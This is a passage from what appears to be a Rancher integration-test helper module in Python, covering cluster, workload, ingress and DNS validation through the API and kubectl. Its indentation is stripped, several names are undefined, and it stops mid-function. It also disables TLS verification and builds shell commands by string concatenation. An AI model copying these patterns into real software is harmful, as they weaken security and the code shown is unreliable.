from copy import deepcopy
from threading import Lock
from threading import Thread
import websocket
import base64
DEFAULT_CATALOG_TIMEOUT = 15
DEFAULT_MONITORING_TIMEOUT = 180
DEFAULT_CLUSTER_STATE_TIMEOUT = 320
DEFAULT_MULTI_CLUSTER_APP_TIMEOUT = 300
DEFAULT_APP_DELETION_TIMEOUT = 360
DEFAULT_APP_V2_TIMEOUT = 60
CATTLE_API_URL = CATTLE_TEST_URL + "/v3"
CATTLE_AUTH_URL = \
CATTLE_TEST_URL + "/v3-public/localproviders/local?action=login"
USER_PASSWORD = os.environ.get('USER_PASSWORD', "None")
ADMIN_PASSWORD = os.environ.get('ADMIN_PASSWORD', "None")
kube_fname = os.path.join(os.path.dirname(os.path.realpath(__file__)),
"k8s_kube_config")
MACHINE_TIMEOUT = float(os.environ.get('RANCHER_MACHINE_TIMEOUT', "1200"))
HARDENED_CLUSTER = ast.literal_eval(
os.environ.get('RANCHER_HARDENED_CLUSTER', "False"))
TEST_OS = os.environ.get('RANCHER_TEST_OS', "linux")
TEST_IMAGE = os.environ.get('RANCHER_TEST_IMAGE', "sangeetha/mytestcontainer")
TEST_IMAGE_PORT = os.environ.get('RANCHER_TEST_IMAGE_PORT', "80")
TEST_IMAGE_NGINX = os.environ.get('RANCHER_TEST_IMAGE_NGINX', "nginx")
TEST_IMAGE_OS_BASE = os.environ.get('RANCHER_TEST_IMAGE_OS_BASE', "ubuntu")
if TEST_OS == "windows":
DEFAULT_TIMEOUT = 300
skip_test_windows_os = pytest.mark.skipif(
TEST_OS == "windows",
reason='Tests Skipped for including Windows nodes cluster')
skip_test_hardened = pytest.mark.skipif(
HARDENED_CLUSTER,
reason='Tests Skipped due to being a hardened cluster')
UPDATE_KDM = ast.literal_eval(os.environ.get('RANCHER_UPDATE_KDM', "False"))
KDM_URL = os.environ.get("RANCHER_KDM_URL", "")
CLUSTER_NAME = os.environ.get("RANCHER_CLUSTER_NAME", "")
RANCHER_CLEANUP_CLUSTER = \
ast.literal_eval(os.environ.get('RANCHER_CLEANUP_CLUSTER', "True"))
env_file = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"rancher_env.config")
AWS_SSH_KEY_NAME = os.environ.get("AWS_SSH_KEY_NAME")
AWS_ACCESS_KEY_ID = os.environ.get("AWS_ACCESS_KEY_ID")
AWS_SECRET_ACCESS_KEY = os.environ.get("AWS_SECRET_ACCESS_KEY")
AWS_REGION = os.environ.get("AWS_REGION")
AWS_SUBNET = os.environ.get("AWS_SUBNET")
AWS_VPC = os.environ.get("AWS_VPC")
AWS_SG = os.environ.get("AWS_SG")
AWS_ZONE = os.environ.get("AWS_ZONE")
AWS_IAM_PROFILE = os.environ.get("AWS_IAM_PROFILE", "")
AWS_S3_BUCKET_NAME = os.environ.get("AWS_S3_BUCKET_NAME", "")
AWS_S3_BUCKET_FOLDER_NAME = os.environ.get("AWS_S3_BUCKET_FOLDER_NAME", "")
LINODE_ACCESSKEY = os.environ.get('RANCHER_LINODE_ACCESSKEY', "None")
NFS_SERVER_MOUNT_PATH = "/nfs"
TEST_RBAC = ast.literal_eval(os.environ.get('RANCHER_TEST_RBAC', "False"))
if_test_rbac = pytest.mark.skipif(TEST_RBAC is False,
reason='rbac tests are skipped')
TEST_ALL_SNAPSHOT = ast.literal_eval(
os.environ.get('RANCHER_TEST_ALL_SNAPSHOT', "False")
)
if_test_all_snapshot = \
pytest.mark.skipif(TEST_ALL_SNAPSHOT is False,
reason='Snapshots check tests are skipped')
DATA_SUBDIR = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'resource')
# As of release 2.4 default rke scan profile is "rke-cis-1.4"
CIS_SCAN_PROFILE = os.environ.get('RANCHER_CIS_SCAN_PROFILE', "rke-cis-1.4")
# here are all supported roles for RBAC testing
CLUSTER_MEMBER = "cluster-member"
CLUSTER_OWNER = "cluster-owner"
PROJECT_MEMBER = "project-member"
PROJECT_OWNER = "project-owner"
PROJECT_READ_ONLY = "read-only"
rbac_data = {
"project": None,
"namespace": None,
"workload": None,
"p_unshared": None,
"ns_unshared": None,
"wl_unshared": None,
"users": {
CLUSTER_OWNER: {},
CLUSTER_MEMBER: {},
PROJECT_OWNER: {},
PROJECT_MEMBER: {},
PROJECT_READ_ONLY: {},
}
}
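# Note: rbac_data is a module-level cache that session-scoped fixtures are expected to
# populate (the shared project/namespace/workload plus one user entry per role constant
# above). A hedged usage sketch -- the exact keys depend on the fixture that fills it in:
#   owner_entry = rbac_data["users"][CLUSTER_OWNER]   # e.g. the created user/token saved by the fixture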
auth_rbac_data = {
"project": None,
"namespace": None,
"users": {}
}
# here are the global role templates used for
# testing globalRoleBinding and groupRoleBinding
TEMPLATE_MANAGE_CATALOG = {
"newUserDefault": "false",
"rules": [
{
"type": "/v3/schemas/policyRule",
"apiGroups": [
"management.cattle.io"
],
"verbs": [
"*"
],
"resources": [
"catalogs",
"templates",
"templateversions"
]
}
],
"name": "gr-test-manage-catalog",
}
TEMPLATE_LIST_CLUSTER = {
"newUserDefault": "false",
"rules": [
{
"type": "/v3/schemas/policyRule",
"apiGroups": [
"management.cattle.io"
],
"verbs": [
"get",
"list",
"watch"
],
"resources": [
"clusters"
]
}
],
"name": "gr-test-list-cluster",
}
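# Hedged usage sketch for the two templates above -- the dynamic rancher client derives its
# create_* methods from the v3 schema, so a test would typically create the role with
# something like the call below and later bind it through a globalRoleBinding:
#   gr = get_admin_client().create_global_role(**TEMPLATE_MANAGE_CATALOG)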
# this is used when testing users from a auth provider
AUTH_PROVIDER = os.environ.get('RANCHER_AUTH_PROVIDER', "")
if AUTH_PROVIDER not in ["activeDirectory", "freeIpa", "openLdap", ""]:
pytest.fail("Invalid RANCHER_AUTH_PROVIDER. Please provide one of: "
"activeDirectory, freeIpa, or openLdap (case sensitive).")
NESTED_GROUP_ENABLED = ast.literal_eval(
os.environ.get('RANCHER_NESTED_GROUP_ENABLED', "False"))
# Admin Auth username and the shared password for all auth users
AUTH_USER_PASSWORD = os.environ.get('RANCHER_AUTH_USER_PASSWORD', "")
# the link to log in as an auth user
LOGIN_AS_AUTH_USER_URL = \
CATTLE_TEST_URL + "/v3-public/" \
+ AUTH_PROVIDER + "Providers/" \
+ AUTH_PROVIDER.lower() + "?action=login"
CATTLE_AUTH_PRINCIPAL_URL = CATTLE_TEST_URL + "/v3/principals?action=search"
# This is used for nested group when a third part Auth is enabled
nested_group = {
"auth_info": None,
"users": None,
"group_dic": None,
"groups": None
}
auth_requirements = not AUTH_PROVIDER or not AUTH_USER_PASSWORD
if_test_group_rbac = pytest.mark.skipif(
auth_requirements,
    reason='Group RBAC tests are skipped. '
'Required AUTH env variables '
'have not been set.'
)
# -----------------------------------------------------------------------------
# global variables from test_create_ha.py
test_run_id = "test" + str(random.randint(10000, 99999))
RANCHER_HOSTNAME_PREFIX = os.environ.get("RANCHER_HOSTNAME_PREFIX",
test_run_id)
CERT_MANAGER_VERSION = os.environ.get("RANCHER_CERT_MANAGER_VERSION", "v1.0.1")
# -----------------------------------------------------------------------------
# this is used for testing rbac v2
test_rbac_v2 = os.environ.get("RANCHER_TEST_RBAC_V2", "False")
if_test_rbac_v2 = pytest.mark.skipif(test_rbac_v2 != "True",
reason='test for rbac v2 is skipped')
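# The skipif markers defined above are meant to be applied as decorators on tests,
# e.g. (illustrative test name only):
#   @if_test_rbac
#   def test_project_owner_can_edit_workload():
#       ...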
def is_windows(os_type=TEST_OS):
return os_type == "windows"
def get_cluster_client_for_token_v1(cluster_id, token):
url = CATTLE_TEST_URL + "/k8s/clusters/" + cluster_id + "/v1/schemas"
return rancher.Client(url=url, token=token, verify=False)
def get_admin_client():
return rancher.Client(url=CATTLE_API_URL, token=ADMIN_TOKEN, verify=False)
def get_user_client():
return rancher.Client(url=CATTLE_API_URL, token=USER_TOKEN, verify=False)
def get_client_for_token(token, url=CATTLE_API_URL):
return rancher.Client(url=url, token=token, verify=False)
def get_project_client_for_token(project, token):
p_url = project.links['self'] + '/schemas'
p_client = rancher.Client(url=p_url, token=token, verify=False)
return p_client
def get_cluster_client_for_token(cluster, token):
c_url = cluster.links['self'] + '/schemas'
c_client = rancher.Client(url=c_url, token=token, verify=False)
return c_client
def up(cluster, token):
c_url = cluster.links['self'] + '/schemas'
c_client = rancher.Client(url=c_url, token=token, verify=False)
return c_client
def wait_state(client, obj, state, timeout=DEFAULT_TIMEOUT):
wait_for(lambda: client.reload(obj).state == state, timeout)
return client.reload(obj)
def wait_for_condition(client, resource, check_function, fail_handler=None,
timeout=DEFAULT_TIMEOUT):
start = time.time()
resource = client.reload(resource)
while not check_function(resource):
if time.time() - start > timeout:
exceptionMsg = 'Timeout waiting for ' + resource.baseType + \
' to satisfy condition: ' + \
inspect.getsource(check_function)
if fail_handler:
exceptionMsg = exceptionMsg + fail_handler(resource)
raise Exception(exceptionMsg)
time.sleep(.5)
resource = client.reload(resource)
return resource
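# Typical call (mirrors validate_cluster_state below): block until the cluster reports
# "active" and include the last observed state in the timeout message:
#   cluster = wait_for_condition(client, cluster,
#                                lambda c: c.state == "active",
#                                lambda c: 'State is: ' + c.state,
#                                timeout=MACHINE_TIMEOUT)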
def get_setting_value_by_name(name):
settings_url = CATTLE_API_URL + "/settings/" + name
head = {'Authorization': 'Bearer ' + ADMIN_TOKEN}
response = requests.get(settings_url, verify=False, headers=head)
return response.json()["value"]
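# Illustrative call (the setting name is an example; any /v3/settings/<name> key works):
#   rancher_version = get_setting_value_by_name("server-version")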
# Return value is negative if v1 < v2, zero if v1 == v2 and positive if v1 > v2
def compare_versions(v1, v2):
if tuple(map(int, (v1.split(".")))) > tuple(map(int, (v2.split(".")))):
return 1
elif tuple(map(int, (v1.split(".")))) < tuple(map(int, (v2.split(".")))):
return -1
else:
return 0
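# Worked examples (dot-separated numeric versions only, e.g. "1.20.4"):
#   compare_versions("1.20.4", "1.19.9")  ->  1
#   compare_versions("1.19.9", "1.19.9")  ->  0
#   compare_versions("1.18.2", "1.19.9")  -> -1
# The tuple comparison assumes every component is an int, so suffixes such as
# "-rancher1" must be stripped before calling.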
def create_project_and_ns(token, cluster, project_name=None, ns_name=None):
server_url = cluster.links['self'].split("/clusters")[0]
client = get_client_for_token(token, server_url)
p = create_project(client, cluster, project_name)
c_client = get_cluster_client_for_token(cluster, token)
ns = create_ns(c_client, cluster, p, ns_name)
return p, ns
def create_project(client, cluster, project_name=None):
if project_name is None:
project_name = random_name()
p = client.create_project(name=project_name,
clusterId=cluster.id)
time.sleep(5)
p = wait_until_available(client, p)
assert p.state == 'active'
return p
def create_project_with_pspt(client, cluster, pspt):
p = client.create_project(name=random_name(),
clusterId=cluster.id)
p = wait_until_available(client, p)
assert p.state == 'active'
return set_pspt_for_project(p, client, pspt)
def set_pspt_for_project(project, client, pspt):
project.setpodsecuritypolicytemplate(podSecurityPolicyTemplateId=pspt.id)
project = wait_until_available(client, project)
assert project.state == 'active'
return project
def create_ns(client, cluster, project, ns_name=None):
if ns_name is None:
ns_name = random_name()
ns = client.create_namespace(name=ns_name,
clusterId=cluster.id,
projectId=project.id)
wait_for_ns_to_become_active(client, ns)
ns = client.reload(ns)
assert ns.state == 'active'
return ns
def assign_members_to_cluster(client, user, cluster, role_template_id):
crtb = client.create_cluster_role_template_binding(
clusterId=cluster.id,
roleTemplateId=role_template_id,
subjectKind="User",
userId=user.id)
return crtb
def assign_members_to_project(client, user, project, role_template_id):
prtb = client.create_project_role_template_binding(
projectId=project.id,
roleTemplateId=role_template_id,
subjectKind="User",
userId=user.id)
return prtb
def change_member_role_in_cluster(client, user, crtb, role_template_id):
crtb = client.update(
crtb,
roleTemplateId=role_template_id,
userId=user.id)
return crtb
def change_member_role_in_project(client, user, prtb, role_template_id):
prtb = client.update(
prtb,
roleTemplateId=role_template_id,
userId=user.id)
return prtb
def create_kubeconfig(cluster, file_name=kube_fname):
generateKubeConfigOutput = cluster.generateKubeconfig()
print(generateKubeConfigOutput.config)
file = open(file_name, "w")
file.write(generateKubeConfigOutput.config)
file.close()
def validate_psp_error_worklaod(p_client, workload, error_message):
workload = wait_for_wl_transitioning(p_client, workload)
assert workload.state == "updating"
assert workload.transitioning == "error"
print(workload.transitioningMessage)
assert error_message in workload.transitioningMessage
def validate_all_workload_image_from_rancher(project_client, ns, pod_count=1,
ignore_pod_count=False,
deployment_list=None,
daemonset_list=None,
cronjob_list=None, job_list=None):
if cronjob_list is None:
cronjob_list = []
if daemonset_list is None:
daemonset_list = []
if deployment_list is None:
deployment_list = []
if job_list is None:
job_list = []
workload_list = deployment_list + daemonset_list + cronjob_list + job_list
wls = [dep.name for dep in project_client.list_workload(namespaceId=ns.id).data]
assert len(workload_list) == len(wls), \
"Expected {} workload(s) to be present in {} namespace " \
"but there were {}".format(len(workload_list), ns.name, len(wls))
for workload_name in workload_list:
workloads = project_client.list_workload(name=workload_name,
namespaceId=ns.id).data
assert len(workloads) == workload_list.count(workload_name), \
"Expected {} workload(s) to be present with name {} " \
"but there were {}".format(workload_list.count(workload_name),
workload_name, len(workloads))
for workload in workloads:
for container in workload.containers:
assert str(container.image).startswith("rancher/")
if workload_name in deployment_list:
validate_workload(project_client, workload, "deployment",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
deployment_list.remove(workload_name)
if workload_name in daemonset_list:
validate_workload(project_client, workload, "daemonSet",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
daemonset_list.remove(workload_name)
if workload_name in cronjob_list:
validate_workload(project_client, workload, "cronJob",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
cronjob_list.remove(workload_name)
if workload_name in job_list:
validate_workload(project_client, workload, "job",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
job_list.remove(workload_name)
# Final assertion to ensure all expected workloads have been validated
    assert not deployment_list + daemonset_list + cronjob_list + job_list
def validate_workload(p_client, workload, type, ns_name, pod_count=1,
wait_for_cron_pods=60, ignore_pod_count=False):
workload = wait_for_wl_to_active(p_client, workload)
assert workload.state == "active"
# For cronjob, wait for the first pod to get created after
# scheduled wait time
if type == "cronJob":
time.sleep(wait_for_cron_pods)
if ignore_pod_count:
pods = p_client.list_pod(workloadId=workload.id).data
else:
pods = wait_for_pods_in_workload(p_client, workload, pod_count)
assert len(pods) == pod_count
pods = p_client.list_pod(workloadId=workload.id).data
assert len(pods) == pod_count
for pod in pods:
if type == "job":
job_type = True
expected_status = "Succeeded"
else:
job_type = False
expected_status = "Running"
p = wait_for_pod_to_running(p_client, pod, job_type=job_type)
assert p["status"]["phase"] == expected_status
wl_result = execute_kubectl_cmd(
"get " + type + " " + workload.name + " -n " + ns_name)
if type == "deployment" or type == "statefulSet":
assert wl_result["status"]["readyReplicas"] == len(pods)
if type == "daemonSet":
assert wl_result["status"]["currentNumberScheduled"] == len(pods)
if type == "cronJob":
assert len(wl_result["status"]["active"]) >= len(pods)
if type == "job":
assert wl_result["status"]["succeeded"] == len(pods)
def validate_workload_with_sidekicks(p_client, workload, type, ns_name,
pod_count=1):
workload = wait_for_wl_to_active(p_client, workload)
assert workload.state == "active"
pods = wait_for_pods_in_workload(p_client, workload, pod_count)
assert len(pods) == pod_count
for pod in pods:
wait_for_pod_to_running(p_client, pod)
wl_result = execute_kubectl_cmd(
"get " + type + " " + workload.name + " -n " + ns_name)
assert wl_result["status"]["readyReplicas"] == pod_count
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
execute_kubectl_cmd(get_pods)
pods_result = execute_kubectl_cmd(get_pods)
assert len(pods_result["items"]) == pod_count
for pod in pods_result["items"]:
assert pod["status"]["phase"] == "Running"
assert len(pod["status"]["containerStatuses"]) == 2
assert "running" in pod["status"]["containerStatuses"][0]["state"]
assert "running" in pod["status"]["containerStatuses"][1]["state"]
def validate_workload_paused(p_client, workload, expectedstatus):
workloadStatus = p_client.list_workload(uuid=workload.uuid).data[0].paused
assert workloadStatus == expectedstatus
def validate_pod_images(expectedimage, workload, ns_name):
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
for pod in pods["items"]:
assert pod["spec"]["containers"][0]["image"] == expectedimage
def validate_pods_are_running_by_id(expectedpods, workload, ns_name):
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
curpodnames = []
for pod in pods["items"]:
curpodnames.append(pod["metadata"]["name"])
for expectedpod in expectedpods["items"]:
assert expectedpod["metadata"]["name"] in curpodnames
def validate_workload_image(client, workload, expectedImage, ns):
workload = client.list_workload(uuid=workload.uuid).data[0]
assert workload.containers[0].image == expectedImage
validate_pod_images(expectedImage, workload, ns.name)
def execute_kubectl_cmd(cmd, json_out=True, stderr=False,
kubeconfig=kube_fname):
command = 'kubectl --kubeconfig {0} {1}'.format(
kubeconfig, cmd)
if json_out:
command += ' -o json'
print("run cmd: \t{0}".format(command))
if stderr:
result = run_command_with_stderr(command, False)
else:
result = run_command(command, False)
print("returns: \t{0}".format(result))
if json_out:
result = json.loads(result)
return result
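# Hedged usage sketch: with json_out=True (the default) the kubectl output is parsed into
# a dict via ' -o json'; with json_out=False the raw text is returned, e.g.:
#   pods = execute_kubectl_cmd("get pods -n " + ns.name)            # dict from 'kubectl ... -o json'
#   version_text = execute_kubectl_cmd("version", json_out=False)   # plain text output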
def run_command(command, log_out=True):
if log_out:
print("run cmd: \t{0}".format(command))
try:
return subprocess.check_output(command, shell=True, text=True)
except subprocess.CalledProcessError as e:
return None
def run_command_with_stderr(command, log_out=True):
if log_out:
print("run cmd: \t{0}".format(command))
try:
output = subprocess.check_output(command, shell=True,
stderr=subprocess.PIPE)
returncode = 0
except subprocess.CalledProcessError as e:
output = e.stderr
returncode = e.returncode
if log_out:
print("return code: \t{0}".format(returncode))
if returncode != 0:
print("output: \t{0}".format(output))
return output
def wait_for_wl_to_active(client, workload, timeout=DEFAULT_TIMEOUT):
start = time.time()
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
while wl.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
return wl
def wait_for_ingress_to_active(client, ingress, timeout=DEFAULT_TIMEOUT):
start = time.time()
ingresses = client.list_ingress(uuid=ingress.uuid).data
assert len(ingresses) == 1
wl = ingresses[0]
while wl.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
ingresses = client.list_ingress(uuid=ingress.uuid).data
assert len(ingresses) == 1
wl = ingresses[0]
return wl
def wait_for_wl_transitioning(client, workload, timeout=DEFAULT_TIMEOUT,
state="error"):
start = time.time()
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
while wl.transitioning != state:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
return wl
def wait_for_pod_to_running(client, pod, timeout=DEFAULT_TIMEOUT, job_type=False):
start = time.time()
pods = client.list_pod(uuid=pod.uuid).data
assert len(pods) == 1
p = pods[0]
if job_type:
expected_state = "succeeded"
else:
expected_state = "running"
    while p.state != expected_state:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
pods = client.list_pod(uuid=pod.uuid).data
assert len(pods) == 1
p = pods[0]
return p
def get_schedulable_nodes(cluster, client=None, os_type=TEST_OS):
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
schedulable_nodes = []
for node in nodes:
if node.worker and (not node.unschedulable):
for key, val in node.labels.items():
# Either one of the labels should be present on the node
if key == 'kubernetes.io/os' or key == 'beta.kubernetes.io/os':
if val == os_type:
schedulable_nodes.append(node)
break
# Including master in list of nodes as master is also schedulable
if ('k3s' in cluster.version["gitVersion"] or 'rke2' in cluster.version["gitVersion"]) and node.controlPlane:
schedulable_nodes.append(node)
return schedulable_nodes
def get_etcd_nodes(cluster, client=None):
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
etcd_nodes = []
for node in nodes:
if node.etcd:
etcd_nodes.append(node)
return etcd_nodes
def get_role_nodes(cluster, role, client=None):
etcd_nodes = []
control_nodes = []
worker_nodes = []
node_list = []
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
for node in nodes:
if node.etcd:
etcd_nodes.append(node)
if node.controlPlane:
control_nodes.append(node)
if node.worker:
worker_nodes.append(node)
if role == "etcd":
node_list = etcd_nodes
if role == "control":
node_list = control_nodes
if role == "worker":
node_list = worker_nodes
return node_list
def validate_ingress(p_client, cluster, workloads, host, path,
insecure_redirect=False):
time.sleep(10)
curl_args = " "
if (insecure_redirect):
curl_args = " -L --insecure "
if len(host) > 0:
curl_args += " --header 'Host: " + host + "'"
nodes = get_schedulable_nodes(cluster, os_type="linux")
target_name_list = get_target_names(p_client, workloads)
for node in nodes:
host_ip = resolve_node_ip(node)
url = "http://" + host_ip + path
if not insecure_redirect:
wait_until_ok(url, timeout=300, headers={
"Host": host
})
cmd = curl_args + " " + url
validate_http_response(cmd, target_name_list)
def validate_ingress_using_endpoint(p_client, ingress, workloads,
timeout=300,
certcheck=False, is_insecure=False):
target_name_list = get_target_names(p_client, workloads)
start = time.time()
fqdn_available = False
url = None
while not fqdn_available:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for endpoint to be available")
time.sleep(.5)
ingress_list = p_client.list_ingress(uuid=ingress.uuid).data
assert len(ingress_list) == 1
ingress = ingress_list[0]
if hasattr(ingress, 'publicEndpoints'):
for public_endpoint in ingress.publicEndpoints:
if public_endpoint["hostname"].startswith(ingress.name) \
or certcheck:
fqdn_available = True
url = \
public_endpoint["protocol"].lower() + "://" + \
public_endpoint["hostname"]
if "path" in public_endpoint.keys():
url += public_endpoint["path"]
time.sleep(10)
validate_http_response(url, target_name_list, insecure=is_insecure)
def get_target_names(p_client, workloads):
pods = []
for workload in workloads:
pod_list = p_client.list_pod(workloadId=workload.id).data
pods.extend(pod_list)
target_name_list = []
for pod in pods:
target_name_list.append(pod.name)
print("target name list:" + str(target_name_list))
return target_name_list
def get_endpoint_url_for_workload(p_client, workload, timeout=600):
fqdn_available = False
url = ""
start = time.time()
while not fqdn_available:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for endpoint to be available")
time.sleep(.5)
workload_list = p_client.list_workload(uuid=workload.uuid).data
assert len(workload_list) == 1
workload = workload_list[0]
if hasattr(workload, 'publicEndpoints'):
assert len(workload.publicEndpoints) > 0
url = "http://"
url = url + workload.publicEndpoints[0]["addresses"][0] + ":"
url = url + str(workload.publicEndpoints[0]["port"])
fqdn_available = True
return url
def wait_until_lb_is_active(url, timeout=300):
start = time.time()
while check_for_no_access(url):
time.sleep(.5)
print("No access yet")
if time.time() - start > timeout:
raise Exception('Timed out waiting for LB to become active')
return
def check_for_no_access(url, verify=False):
try:
requests.get(url, verify=verify)
return False
except requests.ConnectionError:
print("Connection Error - " + url)
return True
def wait_until_active(url, timeout=120):
start = time.time()
while check_for_no_access(url):
time.sleep(.5)
print("No access yet")
if time.time() - start > timeout:
raise Exception('Timed out waiting for url '
'to become active')
return
def wait_until_ok(url, timeout=120, headers={}):
start = time.time()
while not check_if_ok(url, headers=headers):
time.sleep(.5)
if time.time() - start > timeout:
raise Exception(
'Timed out waiting for {0} to become ok'.format(url)
)
return
def wait_for_status_code(url, expected_code=200, timeout=DEFAULT_TIMEOUT):
start = time.time()
r = requests.get(url, verify=False)
while r.status_code != expected_code:
time.sleep(1)
r = requests.get(url, verify=False)
if time.time() - start > timeout:
raise Exception(
'Timed out waiting for status code {0}'
', actual code {1}'.format(
expected_code, r.status_code
)
)
return
def check_if_ok(url, verify=False, headers={}):
try:
res = requests.head(url, verify=verify, headers=headers)
if res.status_code == 200:
return True
return False
except requests.ConnectionError:
print("Connection Error - " + url)
return False
def validate_http_response(cmd, target_name_list, client_pod=None,
insecure=False):
if client_pod is None and cmd.startswith("http://"):
wait_until_active(cmd, 60)
target_hit_list = target_name_list[:]
count = 5 * len(target_name_list)
for i in range(1, count):
if len(target_hit_list) == 0:
break
if client_pod is None:
curl_cmd = "curl " + cmd
if insecure:
curl_cmd += "\t--insecure"
result = run_command(curl_cmd)
else:
if is_windows():
wget_cmd = 'powershell -NoLogo -NonInteractive -Command ' \
'"& {{ (Invoke-WebRequest -UseBasicParsing -Uri ' \
'{0}).Content }}"'.format(cmd)
else:
wget_cmd = "wget -qO- " + cmd
result = kubectl_pod_exec(client_pod, wget_cmd)
result = result.decode()
if result is not None:
result = result.rstrip()
assert result in target_name_list
if result in target_hit_list:
target_hit_list.remove(result)
print("After removing all, the rest is: ", target_hit_list)
assert len(target_hit_list) == 0
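# validate_http_response above asserts round-robin coverage: it makes at most
# 5 * len(target_name_list) requests and expects every pod name to appear at least once,
# e.g. (pod names illustrative; the test image's /name.html is expected to echo the pod name):
#   validate_http_response("http://" + host_ip + "/name.html", ["pod-a", "pod-b"])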
def validate_cluster(client, cluster, intermediate_state="provisioning",
check_intermediate_state=True, skipIngresscheck=True,
nodes_not_in_active_state=[], k8s_version="",
userToken=USER_TOKEN, timeout=MACHINE_TIMEOUT):
    # Allow some time for the "cluster_owner" CRTB to take effect
time.sleep(5)
cluster = validate_cluster_state(
client, cluster,
check_intermediate_state=check_intermediate_state,
intermediate_state=intermediate_state,
nodes_not_in_active_state=nodes_not_in_active_state,
timeout=timeout)
create_kubeconfig(cluster)
if k8s_version != "":
check_cluster_version(cluster, k8s_version)
if hasattr(cluster, 'rancherKubernetesEngineConfig'):
check_cluster_state(len(get_role_nodes(cluster, "etcd", client)))
# check all workloads under the system project are active
# wait for workloads to be active
# time.sleep(DEFAULT_TIMEOUT)
print("checking if workloads under the system project are active")
sys_project = client.list_project(name='System',
clusterId=cluster.id).data[0]
sys_p_client = get_project_client_for_token(sys_project, userToken)
for wl in sys_p_client.list_workload().data:
"""to help run KDM job faster (when there are many clusters),
timeout=300 is set"""
wait_for_wl_to_active(sys_p_client, wl, timeout=300)
# Create Daemon set workload and have an Ingress with Workload
# rule pointing to this daemonSet
project, ns = create_project_and_ns(userToken, cluster)
p_client = get_project_client_for_token(project, userToken)
con = [{"name": "test1",
"image": TEST_IMAGE}]
name = random_test_name("default")
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id,
daemonSetConfig={})
validate_workload(p_client, workload, "daemonSet", ns.name,
len(get_schedulable_nodes(cluster, client)))
if not skipIngresscheck:
pods = p_client.list_pod(workloadId=workload["id"]).data
scale = len(pods)
# test service discovery
validate_service_discovery(workload, scale, p_client, ns, pods)
host = "test" + str(random_int(10000, 99999)) + ".com"
path = "/name.html"
rule = {"host": host,
"paths":
[{"workloadIds": [workload.id],
"targetPort": TEST_IMAGE_PORT}]}
ingress = p_client.create_ingress(name=name,
namespaceId=ns.id,
rules=[rule])
wait_for_ingress_to_active(p_client, ingress)
validate_ingress(p_client, cluster, [workload], host, path)
return cluster
def check_cluster_version(cluster, version):
cluster_k8s_version = \
cluster.appliedSpec["rancherKubernetesEngineConfig"][
"kubernetesVersion"]
assert cluster_k8s_version == version, \
"cluster_k8s_version: " + cluster_k8s_version + \
" Expected: " + version
expected_k8s_version = version[:version.find("-rancher")]
k8s_version = execute_kubectl_cmd("version")
kubectl_k8s_version = k8s_version["serverVersion"]["gitVersion"]
assert kubectl_k8s_version == expected_k8s_version, \
"kubectl version: " + kubectl_k8s_version + \
" Expected: " + expected_k8s_version
def check_cluster_state(etcd_count):
css_resp = execute_kubectl_cmd("get cs")
css = css_resp["items"]
components = ["scheduler", "controller-manager"]
for i in range(0, etcd_count):
components.append("etcd-" + str(i))
print("components to check - " + str(components))
for cs in css:
component_name = cs["metadata"]["name"]
assert component_name in components
components.remove(component_name)
assert cs["conditions"][0]["status"] == "True"
assert cs["conditions"][0]["type"] == "Healthy"
assert len(components) == 0
def validate_dns_record(pod, record, expected, port=TEST_IMAGE_PORT):
# requires pod with `dig` available - TEST_IMAGE
host = '{0}.{1}.svc.cluster.local'.format(
record["name"], record["namespaceId"])
validate_dns_entry(pod, host, expected, port=port)
def validate_dns_entry(pod, host, expected, port=TEST_IMAGE_PORT):
if is_windows():
validate_dns_entry_windows(pod, host, expected)
return
# requires pod with `dig` available - TEST_IMAGE
if HARDENED_CLUSTER:
cmd = 'curl -vs {}:{} 2>&1'.format(host, port)
else:
cmd = 'ping -c 1 -W 1 {0}'.format(host)
cmd_output = kubectl_pod_exec(pod, cmd)
connectivity_validation_pass = False
for expected_value in expected:
if expected_value in str(cmd_output):
connectivity_validation_pass = True
break
assert connectivity_validation_pass is True
if HARDENED_CLUSTER:
assert " 200 OK" in str(cmd_output)
else:
assert " 0% packet loss" in str(cmd_output)
dig_cmd = 'dig {0} +short'.format(host)
dig_output = kubectl_pod_exec(pod, dig_cmd)
for expected_value in expected:
assert expected_value in str(dig_output)
def validate_dns_entry_windows(pod, host, expected):
def ping_check():
ping_cmd = 'ping -w 1 -n 1 {0}'.format(host)
ping_output = kubectl_pod_exec(pod, ping_cmd)
ping_validation_pass = False
for expected_value in expected:
if expected_value in str(ping_output):
ping_validation_pass = True
break
return ping_validation_pass and (" (0% loss)" in str(ping_output))
wait_for(callback=ping_check,
timeout_message="Failed to ping {0}".format(host))
def dig_check():
dig_cmd = 'powershell -NoLogo -NonInteractive -Command ' \
'"& {{ (Resolve-DnsName {0}).IPAddress }}"'.format(host)
dig_output = kubectl_pod_exec(pod, dig_cmd)
